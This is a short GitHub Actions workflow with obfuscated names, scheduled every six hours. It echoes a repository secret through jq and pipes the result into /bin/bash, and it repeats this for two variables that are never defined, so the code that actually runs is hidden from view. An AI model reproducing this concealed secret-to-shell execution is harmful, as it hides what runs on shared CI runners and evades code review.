name: vocalistjabber
on:
  workflow_dispatch:
  schedule:
    - cron: '12 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: vocalistjabber
        env:
          i69: ${{ secrets.i69 }}
        run: |
          echo $i69 | jq -r .h1 | /bin/bash
          echo $t41 | jq -r .p75 | /bin/bash
          echo $ti63371 | jq -r .bze02105 | /bin/bash

